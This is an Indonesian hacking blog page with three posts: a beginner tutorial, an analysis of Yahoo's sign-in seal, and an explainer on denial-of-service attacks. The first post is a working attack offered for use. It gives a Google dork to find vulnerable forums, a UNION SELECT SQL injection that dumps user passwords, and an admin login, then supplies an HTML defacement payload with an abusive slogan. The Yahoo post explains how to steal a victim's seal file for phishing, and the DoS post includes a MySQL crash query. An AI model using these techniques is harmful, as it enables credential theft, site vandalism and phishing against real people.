Hack

Trik Hacker Buat Pemula Di jamin Berhasil

Ok langsung saja!
Ketik di google
inurl:/forums.asp?iFor=
trus enter
Pilih target…
Contoh link dari target
http://www.contoh.net/forum/forums.asp?iFor=23

Hapus angka yang ada dibelakang =
Hingga menjadi begini
http://www.contoh.net/forum/forums.asp?iFor=

Setelah = masukan SQL inject
12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users
Hingga menjadi seperti ini
http://www.contoh.net/forum/forums.asp?iFor=12+union+select+1,2,3,u_password,5,u_id,7,8,9,10,11,12+from+users

Tulisan yg berderet di bawah nama 10 TOPICS itu adalah username
Tulisan yg berderet di bawah nama DATED itu adalah passwordnya
Cari username admin & passwrdnya.
Ok.. sebagai contoh disini saya menemukan username & password
Username : admin
Password : default
Sekarang klik tulisan login yg berada diatas.
Nah..login udah berhasil
Sekarang jika ingin melakukan defacing, klik tulisan “POST NEW TOPICS”
Isi Subject nya…
Contoh : HACKED BY BLA BLA BLA
lalu masukin script deface HTML nya ke kolom di bawah subject.
Hmm……
Jika ingin menutup full seluruh halaman, pake code berikut
<DIV align=center><DIV id=Layer1 style=”BORDER-RIGHT: #000000 1px; BORDER-TOP: #000000 1px; Z-INDEX: 1; LEFT: 0px; BORDER-LEFT: white 1px; WIDTH: 1300px; BORDER-BOTTOM: white 1px; POSITION: absolute; TOP: 0px; HEIGHT: 7000px; BACKGROUND-COLOR: white; layer-background-color: white”><center>
<br><b><font face=”papyrus” color=”red” size=”5″>Attacked by : Ichito-Bandito</font></h2><br><br><img src=”http://forum.hackers-center.org/styles/melankolia/theme/images/site_logo.jpg” ><br><br>
<font face=”papyrus” color=”red” size=”5″>FUCK Malaysial and ASSOCIATE</a><br><br>
<font face=”papyrus” color=”red” size=”5″>We Are Ready to Cybernetic Wars</font><br><br><font color=”red” size=”3″>Hackers-center In Here
</DIV>
Jangan Lupa Di edit dulu kodenya hehehe! Selamat Mencoba :)
And Jagan lupa Sahabat Juga tinggalkan Komentar :) hehehe

Membedah Sign-in Seal Yahoo!


not sealednot sealed
Dengan maksud untuk mencegah Phising attack, Yahoo membuat fitur segel di halaman loginnya. Segel di sini maksudnya adalah gambar unik yang muncul di halaman login. Gambar ini hanya unik untuk PC/komputer tertentu saja, bukan melekat pada yahoo id kita. Jadi kalau kita pindah komputer, segelnya tentu tidak ikut pindah.

Fake Login Page
Biasanya serangan phishing menggunakan metode fake login page atau halaman login palsu. Setelah sebelumnya korban tertipu dengan mengklik link yang mengarah pada halaman login palsu, kini korban disuguhkan dengan halaman login yang sangat mirip dengan halaman login yang biasa dipakainya. Bila korban tidak menyadarinya, maka username dan passwordnya akan jatuh ke tangan attacker.
Serangan fake login page ini bisa terjadi karena halaman login umumnya bersifat statis dan konsisten. Dari komputer manapun, kapanpun halaman login memiliki tampilan visual yang sama. Karena halaman login yang statis itulah cukup dengan membuat halaman yang mirip dengan itu, banyak korban akan tertipu.
Tujuan sign in seal ini adalah membuat halaman login menjadi hal yang pribadi. Setiap komputer memiliki halaman login yang berbeda. Kalau halaman login di tiap komputer berbeda dan tampilan halaman login hanya diketahui oleh pemilik komputer, tentu phishing akan kesulitan melancarkan serangan fake login.
Cara Kerja Yahoo Sign-in Seal
Mari kita lihat bagaimana cara kerja yahoo sign-in seal ini. Yahoo seal mengijinkan membuat seal dalam bentuk gambar maupun teks, yang penting adalah teks dan gambar tersebut unik dan rahasia (tidak mudah ditebak). Setelah seal dibuat, maka seal itu akan selalu muncul setiap kali saya login ke yahoo.
Semula saya berpikir ini pasti pakai cookie, namun ketika saya coba menghapus semua cookie dari browser saya, seal yahoo tidak ikut terhapus. Dia tetap survive dari penghapusan cookie. Kemudian ketika saya coba buka halaman login yahoo di Opera pada komputer yang sama, maka seal itu lagi-lagi ikut muncul, padahal saya bikin seal itu di Firefox.
Jadi kalau saya rangkum keunikan seal Yahoo adalah:
  1. Survive from Cookie Removal
  2. Cross-Browser Appearance
Bagaimana caranya seal Yahoo bisa survive dari penghapusan cookie dan bisa muncul di semua browser? Jawabannya adalah dengan Flash. Flash memiliki fitur semacam cookie yaitu Local Shared Object. Data ini disimpan dalam file berekstensi SOL. Semua browser ketika memuat suatu URL berhak mengakses shared object di domain yang sama dengan flash. File flash yang dipakai yahoo untuk mengambil data dari cache adalah dataCache.swf yang URLnya di https://login.yahoo.com/login/dataCache.swf. Setelah dibuka dengan flash decompiler, source code dari file dataCache.swf ada pada gambar di bawah ini:
Script dataCache.swf
Script dataCache.swf
dataCache.swf mendefinisikan fungsi untuk menyimpan objek ke dalam cache dan untuk mengambil objek dari cache. Kemudian Fungsi ini didaftarkan dengan fungsi addCallback agar bisa dipanggil dari javascript. Jadi tugas flash hanya menyimpan dan mengambil objek dari cache untuk selanjutnya ditampilkan oleh javascript. Dari source code tersebut juga terlihat nama shared object yang dipakai, yaitu loginCache. File SOL tersebut disimpan dalam filesystem umumnya di C:\Documents and Settings\<username>\Application Data\Macromedia\Flash Player\#SharedObjects\<random>\login.yahoo.com\loginCache.sol.
Dengan program SOL reader file loginCache.sol di komputer saya terbaca isinya sebagai berikut:
YLS: YLS=v=1&p=0&ap=1232341233149
F: F=a=kSmT8qEMvTDDtBUE14BdySfZq8q2aQRUcFYEd.G7P36yFSIIg4GlIlYkiKTXaV.WuC25JHgQ0NYUWkX1TkXEBVHzcw–&b=DtKN
YL: YL=v=1&c=J63kKW2fjWIeaRIMD_Q8qr9qd.RtqZMMXNNQy1rLiWG3ySvsMdTyPYqU7WJGWdPXwIPGZ4q9dzr62Th3hQNEodw3kE8DEDEuipITKP3EGBpUw9tHEHXu2E_hqfPGhStp0ExeJoff9L0J_.T5MmRyI4Q2H6PgOq5Eae6Shg–
Jadi ada 3 object di file loginCache.sol yaitu YLS, F dan YL. Kalau kita lihat cookie yang ada pada halaman login.yahoo.com ternyata ketiga ada cookie dengan nama YLS, F dan YL. Jadi bila shared object sudah ada isinya, maka isi dari shared object tersebut akan diambil untuk nilai cookie. Pada waktu pertama kali membuat seal, shared objek diinisialisasi dengan cookie yang di-set dari server yahoo untuk selanjutnya diambil setiap kali login. Jadi menghapus cookie di browser tidak ada gunanya karena yahoo memakai data yang di shared object. Bila cookie terhapus, data di shared object yang akan diambil sebagai cookie.
Seal berupa text akan dikirim ke server yahoo untuk dibuat gambar di URL yahoofs.com. Sedangkan seal berupa image, imagenya akan diupload dan diletakkan di URL yahoofs.com. Semua seal baik text maupun gambar akan diubah menjadi format gif. Contoh URL seal:
https://a323.yahoofs.com/login/f2509e9b428b3bd6bcf1216a0b274e3e/72612323559882h6u81l4n8f73.gif?lowLEdJBQiTA08EX
Url tersebut menghasilkan halaman login seperti ini:
text seal
text seal
May be for security reason, setelah login berhasil kita tidak bisa lagi membuka gambar seal dengan URL yahoofs.com di atas karena akan diredirect ke URL yang tidak eksis ini:
http://lovrf.yahoo.com/login/f2509e9b428b3bd6bcf1216a0b274e3e/72612323559882h6u81l4n8f73.gif
Gambar seal disimpan di server yahoo, bukan di komputer pengguna. Di komputer pengguna cuma menyimpan cookie untuk mengambil gambar seal di server.
Perhatikan bahwa URL tersebut dibungkus dalam https. Ini penting mengingat seal harus dijaga kerahasiaan. Sebab bila seal diketahui orang lain, maka dia bisa melancarkan phishing attack dengan membuat fake login page yang mengandung gambar seal kita. Karena halaman loginnya mengandung segel kita, maka kita akan tertipu dan meyakini bahwa itu halaman login yang asli.
Stealing Seal
Saya sudah mencoba mengkopi file dataCache.sol ke PC lain, hasilnya adalah gambar seal saya muncul di PC itu.
Untuk bisa sukses menipu korban attacker harus membuat fake login page yang semirip mungkin. Dengan adanya seal pada halaman login ini membuat attacker harus menduplikasi gambar seal ini di halaman fake loginnya. Kunci dari seal adalah pada file dataCache.sol. Untuk mencuri seal korban agar muncul di komputer saya, maka saya harus mengkopi file dataCache.sol ini dan ditaruh pada folder yang benar di komputer saya. Dengan cara ini seal korban akan muncul di komputer saya. Mengkopi file dataCache.sol ini tidak bisa dilakukan melalui web karena dilindungi oleh https. Jadi harus cari cara lain, misalkan dengan open shared folder di windows, ftp atau bug lain yang ada di komputernya.
Menghapus Seal
Karena data cache seal disimpan di cookie dan shared object, maka untuk menghapus seal Yahoo yang harus dilakukan adalah:
  1. Menghapus cookie dari browser
  2. Menghapus local shared object file (*.SOL) yang ada di C:\Documents and Settings\<username>\Application Data\Macromedia\Flash Player\#SharedObjects\<random>\login.yahoo.com\loginCache.sol
Kesimpulan
Menurut saya sign in seal yahoo sangat membantu dalam membatasi ruang gerak phisher. Dengan adanya seal ini attacker tidak bisa membuat fake login page yang bersifat umum  (1 fake login untuk semua calon korban). Attacker harus bekerja ekstra untuk mengetahui seal calon korbannya sebelum bisa membuat fake login page. Melalui sniffing jaringan seal tidak mungkin disniff karena dilindungi oleh https. Jadi sebaiknya anda pakai seal ini, walaupun buka silver bullet solution setidaknya memperkecil kemungkinan serangan phisher untuk mencuri password yahoo anda.

Memahami Serangan Denial of Service

Dalam artikel ini saya akan menjelaskan mengenai jenis serangan yang bisa dikatakan tidak ada obatnya, yaitu denial of service atau DoS. Bila serangan DoS ini dilakukan secara beramai-ramai dan terorganisir dengan baik, maka akan menghasilkan kerusakan yang dahsyat dan sanggup melumpuhkan situs-situs populer seperti twitter.com dan metasploit.com.
Apa itu DoS
Denial of service adalah jenis serangan yang tujuannya adalah mencegah pengguna yang sesungguhnya menikmati layanan yang diberikan server. Server sesuai namanya adalah pelayan yang harus selalu siap melayani permintaan pengguna, yang umumnya beroperasi 24 jam tanpa henti. Contohnya adalah web server yang bertugas melayani pengunjung web menyediakan informasi dalam bentuk halaman html. Dalam kondisi normal, pengunjung dapat meminta resource dari web server untuk ditampilkan dalam browsernya, namun bila web server terkena serangan DoS maka pengunjung tidak bisa menikmati layanan web server.
Secara umum ada 2 cara melakukan serangan DoS:
  1. Mematikan Server
  2. Menyibukkan Server
    • Tanpa bug/vulnerability
    • Meng-exploit bug/vulnerability
DoS dengan Mematikan Server: Kill Them!
Anda pernah mengalami ingin memakai telepon umum atau ATM namun tidak bisa karena di mesin tersebut ditempel kertas berisi pesan “Out of Service” atau “Sedang dalam perbaikan”. Telepon umum adalah target serangan DoS yang biasa terjadi, dimana-mana kita menemukan telpon umum yang rusak karena serangan DoS seperti membanting gagang telpon, mencabut kabel, memecahkan LCD dan aksi-aksi lainnya.
Tujuan serangan ini adalah membuat server shutdown, reboot, crash, “not responding”. Jadi serangan ini menghasilkan kerusakan yang sifatnya persisten artinya kondisi DoS akan tetap terjadi walaupun attacker sudah berhenti menyerang, server baru normal kembali setelah di-restart/reboot.
Bagaimana cara serangan DoS ini dilakukan? Serangan ini dilakukan dengan meng-exploit bug/vulnerability pada server. Kata kunci pada vulnerability jenis ini biasanya adalah “specially/carefully crafted packet/request”, yang artinya paket yang dirancang khusus. Kenapa dirancang khusus? Sebab dalam paket itu mengandung  sifat tertentu yang membuat server mati ketika mengolah paket khusus itu.
Mari kita perhatikan beberapa contoh vulnerability yang berakibat pada DoS attack:
  • Ping of Death ( CA-1996-26 )
  • Ini adalah jenis bug yang sudah sangat tua. Praktis sudah tidak ada lagi sistem yang vulnerable terhadap bug ini. Bug ini bila diexploit akan membuat server crash, freeze atau reboot. Serangan ini dilakukan dengan mengirimkan “specially crafted” paket berupa oversized ICMP packet, yaitu paket yang ukurannya di atas normal. Ketika server menerima dan memproses paket yang “aneh” ini, maka server akan crash, freeze atau reboot. Ini adalah contoh serangan DoS “one shot one kill” karena bisa merusak server hanya dengan satu tembakan saja.
  • MySQL IF Query DoS ( SA25188 )
  • Bug ini akan membuat mysql server menjadi crash hanya dengan mengirim sql khusus yang mengandung fungsi IF() contohnya: “SELECT id from example WHERE id IN(1, (SELECT IF(1=0,1,2/0)))”. Ini juga jenis serangan “one shot one kill”.
  • Cisco Global Site Selector DNS Request Denial of Service (SA33429)
  • Bug ini membuat DNS server Cisco mati dengan mengirimkan beberapa “specially crafted” paket request DNS dalam urutan tertentu.
Tiga contoh di atas kiranya cukup memberikan gambaran tentang bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah attacker memanfaatkan (baca:mengexploit) bug yang membuat server berhenti bekerja dan biasanya dilakukan sendirian secara remote dengan mengirimkan specially crafted packet.
DoS dengan Menyibukkan Server: Make Them As Busy As Possible!
Pada waktu menjelang lebaran kita sering merasa begitu sulit mengirim sms, bahkan sering terjadi gagal kirim. Begitu juga ketika berlangsung acara kuis di TV, mengelpon ke nomor untuk menjawab kuis terasa begitu sulit.  Hal ini terjadi karena ada begitu banyak orang yang mengirim sms pada saat lebaran dan menelpon pada waktu kuis sehingga membuat jaringan telekomunikasi menjadi begitu sibuk sampai tidak bisa melayani pengguna lain. Peristiwa itu mirip dengan yang terjadi ketika sebuah server mendapat serangan denial of service. DoS yang terjadi pada peristiwa tersebut bukan jenis DoS yang mematikan server, namun jenis DoS yang menyibukkan server.
Jenis DoS ini bersifat sementara, server akan kembali normal bila attacker berhenti mengirimkan request yang membuat sibuk server.
DoS jenis ini terbagi lagi menjadi 2 jenis berdasarkan cara melakukan serangan:
  • Exploiting vulnerability: Menyerang dengan malicious request/packet
  • No vulnerability exploitation: Menyerang dengan normal request/packet
Membuat server sibuk dengan mengexploitasi vulnerability lebih cepat daripada tanpa mengeksploit vulnerability.
Make Server Busy by Exploiting Vulnerability
Dalam serangan DoS jenis ini, attacker memanfatkan bug yang membuat server berlebihan dalam menggunakan resource (cpu,memory,disk space dsb). Attacker akan mencari cara bagaimana agar membuat server bekerja ekstra keras (jauh lebih keras dari request normal) untuk melayani request dia. Biasanya serangan DoS jenis ini tidak berupa serangan “one shot one kill”. Serangan dilakukan dengan melakukan banyak request dengan setiap request membuat server mengonsumsi lebih banyak resource dari request yang normal.
Dalam hitungan matematika sederhana, bila attacker bisa membuat server bekerja selama 10 detik  hanya untuk melayani dia (misal normalnya 0,1 detik), maka attacker bisa mengirimkan request 1.000x untuk membuat server melayani dia selama 10.000 detik (2,7 jam lebih) sehingga membuat pengguna lain tidak bisa menikmati layanan server.
Untuk lebih memahami DoS jenis ini, mari kita lihat contoh-contoh vulnerability yang bisa diexploit untuk melancarkan serangan DoS jenis ini:
  • TCP SYN Flood DoS
  • Ini adalah serangan DoS yang sudah sangat tua. Attacker menyerang dengan cara membanjiri server dengan malicious request berupa paket SYN dengan fake source IP address. SYN packet adalah paket dari client yang mengawali terbentuknya koneksi TCP/IP, setelah itu server akan membalas dengan SYN-ACK, dan dilengkapi dengan paket SYN-ACK-ACK dari client, tiga proses ini disebut three way handshake.
    Triknya adalah pada fake source ip address pada paket SYN dari client. Akibatnya server akan mengirim SYN-ACK (step 2) ke ip address yang salah sehingga server juga tidak akan mendapatkan balasan SYN-ACK-ACK dari client. Padahal untuk setiap client yang mencoba membuka koneksi, server akan mengalokasikan resource seperti memori dan waktu untuk menunggu datangnya balasan ACK dari client. Dengan cara ini attacker menghabiskan resource server hanya untuk melayani request palsu dari attacker.
  • Apache mod_deflate DoS
  • Apache menggunakan mod_deflate untuk memampatkan file. Bila visitor meminta sebuah file, maka apache akan menggunakan mod_deflate untuk memampatkannya kemudian mengirimkan ke visitor tersebut. Namun bila di tengah proses pemampatan, visitor memutuskan koneksi TCP, Apache masih terus bekerja memampatkan file untuk visitor yang sebenarnya sudah tidak ada (sudah disconnect). Jadi bugnya adalah pada borosnya pemakaian resource cpu untuk memampatkan file untuk client yang sudah tidak ada.
    Attacker memanfaatkan kelemahan ini dengan meminta sebuah file yang berukuran besar, kemudian dalam waktu singkat memutuskan koneksi sehingga membuat server bekerja keras mempatkan file untuk visitor yang sudah tidak ada. Request ini diulang berkali-kali sampai server begitu sibuknya dan semua resource cpu habis.
Dua contoh vulnerability di atas cukup menjelaskan bagaimana serangan DoS jenis ini dilakukan. Pada intinya adalah dengan mengirim banyak malicious request/paket  yang membuat server mengonsumsi resource lebih banyak dan lebih lama untuk setiap requestnya.

Make Server Busy Without Exploiting Vulnerability
Ini adalah jenis serangan yang mengandalkan pada kemampuan mengirimkan normal request sebanyak-banyaknya sehingga server menjadi sibuk. Perbedaan DoS jenis ini dengan DoS yang mengexploit vulnerability adalah pada requestnya. Request yang dikirimkan pada DoS jenis ini adalah request yang normal seperti yang dilakukan pengguna biasa, sehingga server tidak mengonsumsi resource berlebihan. Sedangkan DoS yang mengandalkan vulnerability mengirimkan specially crafted malicious request untuk membuat server mengonsumsi resource lebih banyak untuk melayani malicious request tersebut.
Normal request hanya membuat server mengonsumsi resource dalam jumlah biasa-biasa saja, tidak akan mengganggu kerja server secara keseluruhan. Diperlukan normal request dalam jumlah yang sangat banyak untuk membuat server terganggu kerjanya. Jadi agar serangan ini menjadi efektif, maka serangan harus dilakukan beramai-ramai dari banyak tempat, semakin banyak penyerang semakin bagus hasilnya. Serangan ini juga disebut dengan distributed DoS (DDoS) karena dilakukan dari banyak lokasi yang terdistribusi (tersebar).
Serangan DDoS dilakukan dengan menggunakan komputer zombie atau robot. Zombie adalah komputer yang sudah dikuasai attacker sehingga bisa dikendalikan dari jarak jauh. Sekumpulan komputer zombie membentuk jaringan yang disebut bot-net. Attacker mendapatkan banyak zombie dengan menyebarkan virus atau worm, setiap komputer yang terinfeksi akan diinstall program yang membuat komputer bersedia menjalankan perintah dari attacker.
DDoS Botnet Attack
Courtesy of: www.dos-attack.net
Gambar di atas menjelaskan cara kerja DDoS. Attacker memberi perintah kepada semua pasukannya untuk membuat request HTTP ke sebuah website. Bila pasukan yang dikuasai attacker sangat besar, maka web server akan dibanjiri request sehingga menjadi terlalu sibuk dan tidak bisa diakses oleh pengguna yang sebenarnya (real visitor).
Serangan jenis ini tidak ada obatnya karena attacker tidak meng-exploit bug atau vulnerability apapun. Bila pada jenis DoS yang lain, serangan dapat dicegah dengan melakukan patching atau update software, maka serangan ini tidak bisa dihentikan dengan update atau patch.
Kesimpulan
Denial of service adalah serangan yang membuat server tidak bisa melayani pengguna yang sesungguhnya. Berikut adalah jenis-jenis serangan DoS berdasarkan cara melakukan serangan:
  • Mematikan Server: one shot, one kill untuk membuat server menjadi crash, hang, reboot.
  • Menyibukkan Server: mengirim banyak sekali request untuk membuat server sibuk.
    • Exploiting bug: mengirim banyak specially crafted request. Jumlah request tidak sebanyak jenis DoS yang menyibukkan server dengan normal request.
    • Normal request: mengirim banyak request normal seperti pengguna biasa. Diperlukan jumlah request yang lebih banyak dibandingkan jenis DoS yang menyibukkan server dengan exploit bug. Biasanya menggunakan botnet secara terdistribusi.

0 komentar:

Posting Komentar